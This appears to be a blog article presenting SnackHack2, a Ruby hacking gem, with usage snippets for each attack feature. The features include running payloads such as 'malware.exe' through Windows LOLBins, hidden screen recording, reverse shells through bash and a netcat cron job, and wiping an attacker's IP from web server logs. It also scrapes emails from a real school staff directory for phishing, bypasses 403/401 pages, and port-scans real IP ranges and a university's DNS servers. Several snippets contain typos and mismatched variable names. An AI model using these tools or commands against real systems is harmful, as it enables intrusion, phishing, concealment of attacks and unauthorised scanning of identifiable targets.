This tool comes in gem form and can also be downloaded from Github.com. Originally, this project would be my senior project, but I had to scrape the idea for a simpler project due to my course workload and mental health.

Please check out my other article about this tool, the article name is SnackHack2: Scripts which takes the SnackHack2 program and shows examples of possible user cases.

To install the gem run the command below.

gem install snackhack2

Indirect Command Injection

This code when ran, will create a pop-up with the title “CLICK ME”. The prompt will show the word “test”. This could be used to get the target to run a command or program. Of course, the prompt and title can be changed to anything.

cj = Snackhack2::CommandInjection.new
cj.prompt = "test"
ck.title = "CLICK ME"
cj.wlrmdr_With_prompt

As the name might apply, the code has the same function as the code above but without the prompt. By default it will run “calc.exe” but this can be changed as seen below.

cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.wlrmdr_without_prompt

Conhost

Conhost.exe is a LOLBin that can be used to execute commands. By default, it will execute “calc.exe”

cj = Snackhack2::CommandInjection.new
cj.exe = "malware.exe"
cj.conhost


## This will run the same thing but the window will be hidden. 
cj.conhost_hide

SSH.exe to execute command

Like before by default, the code below will run “calc.exe”. This can be changed to anything.

cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.ssh

LolBin MSR.exe Recording Screen

The code below uses a feature built-in to windows to record the screen. It will save the screenshots to a file named “screenshots.zip” by default. Again, this can be easily changed. By default, it will record 60 seconds, but this can also be changed as seen below.

ss = Snackhack2::ScreenShot.new
ss.time = 64
ss.run

IP Lookup

IP stands for Internet Protocol. Every computer and website has one. This feature uses nslookup and Ping to find the IP of the site. This technique can be used by hackers at the recon stage of an attack.

i = Snackhack2::IpLookup.new("https://x.com")
i.run

Extract Emails from Website

An image of a blue envelope.

A hacker or pen tester needs to find targets, one way of acquiring emails is using a spider to crawl a site to scrape all the emails that could be used for phishing. By default the max_depth is 2, of course, this can be changed like the example below. This is another way for a threat actor or hacker to perform recon on a target. With the users email they could try to phish them. get them to install malware.

e = Snackhack2::Email.new("https://www.tupeloschools.com/leadership/staff-directory")
e.run

# set @max_depth to two
e.max_depth = 2
puts e.max_depth

Web Server log cleaner

This code will search web server logs for the given IP and replace the IP with a randomly generated IP. This is helpful for post-exploitation if a hacker or pen tester wants to remove any traces of scanning the web server or how they exploited a vulnerability in the web site.

w = Snackhack2::WebServerCleaner.new('8.1.9.2')
w.run

WordPress

A hacker targeting WordPress!

WordPress is another Content Management System. This function of the code works similar to how the Drupal score system works. The code tries to see if the site is built by WordPress. The higher the score the more likely that the site is built using WordPress. Every time that the code detects it might be WordPress, it will add 10 to the score. There currently are 7 elements in the array that the code uses to determine if it is a WordPress site.

require "snackhack2"
w=Snackhack2::WordPress.new("https://kinsta.com)
w.run

Some of the features the code has is that will try to detect how many users there are and their usernames, see if there is any open directories. During the recon stage of an attack the threat actor must find out what software and versions the web server are running so that they can look to see if any of them are vulnerable.

Examples of other possible scripts can be found here.

Reverse Shell

Will print out the command to run and will set a cron job that will run every minute that will use NetCat to connect to the server.

l = Snackhack2::ReverseShell.new("6.1.9.1", "9")
l.run

This will use bash.exe to connect to a reverse shell. On the remote computer run: “nc -lvp 4444“. After running the code below the computer will connect to the remote server, giving the threat actor remote control of the computer. This is all done by Living of the Land, without any third-party tools, just the features built into Windows. This is favored by threat actors since they do not need to install any malware that could be detected and removed.

r = Snackhack2::ReverseShell.new("1.1.1.1", "4")
r.bash

## Version 2 of bash
r.version2

List Users

Users on the system

Search for Users on Windows. After Hacking the victim, the threat actor might want to gather up the usernames of the people using the computer. This feature will help you gather that information!

lu = Snackhack2::ListUsers.new
lu.user = "admin"
lu.windows_search_user

List users on Linux-based systems by viewing the “/etc/passwd” file.

lu = Snackhack2::ListUsers.new
lu.linux

The code below will list all the users on a Windows-based system.

lu = Snackhack2::ListUsers.new
lu.windows

After the code below is ran, it will determine if the Operating System is Windows or Linux and run the correct code that will list the users.

lu = Snackhack2::ListUsers.new
lu.auto

Bypassing 403 & 401

This code performs a bunch of little tricks that will hopefully be able to bypass the pages. This might take a while because it uses a list of web paths.

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.dots

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.basic

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.uppercase

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.url_encode

Extract Crypto Addresses

Monero
Bitcoin
Litecoin
Dash
Stellar
Ethereum
Bitcoin Cash
Dogecoin

c = Snackhack2::CryptoExtractWebsite.new("https://coincarp.com/currencies/tron/richlist/")
puts ca.save_file
ca.save_file = false
puts ca.save_file
ca.run

ca.monero
ca.bitcoin
ca.litecoin
ca.dash
ca.stellar
ca.ethereum
ca.bitcoincash
ca.dogecoin

SiteMap XML

s = Snackhack2::SiteMap.new("https://x.com")
sm.run

Port Scan

Port Scanner Icon.

The SnackHack2 code will run a port scan on the given IP and display the results in the terminal. A port scanner can be used to perform recon on a target machine. It will find open, closed or filtered ports.

tcp = Snackhack2::PortScan.new
tcp = "167.71.98.134"
tcp.run

The code below will generate 100 random IPs and perform a port scan on all the generated IPs.

require 'snackhack2'

tcp = Snackhack2::PortScan.new
tcp.count = 100
tcp.mass_scan

This code below will perform a port scan like the other pieces of code but it will only extract or show a certain port, in the case of the example below it will only show port 22. Port 22 is often used by SSH services.

require './lib/snackHack2'

for i in 0..255
  puts "167.71.98.#{i}"
  tcp = Snackhack2::PortScan.new
  tcp.ip = "167.71.98.#{i}"
  tcp.run
  i += 1
  print("\n\n")
end
tcp.delete = true
tcp.ports_extractor("22")

DNS

This code below will run a couple different things such as a port scan, a DNS lookup and a IP lookup. It will get all the DNS IPs for utica.edu, save them in an array named ips. Finally it will run a port scan on the IPs collected by dns function.

require './lib/snackHack2'

ps   = Snackhack2::PortScan.new
dns  = Snackhack2::Dns.new
ip   = Snackhack2::IpLookup.new 

ips  = []


dns.site  = "utica.edu"
ns        = dns.nameserver
ns.each do |i|
 ip.site = i
 ips << ip.get_ip.shift
end

ips.each do |ii|
 ps.ip = ii.to_s
 ps.run
end

SnackHack2: Hacking tool and Recon

Table of Contents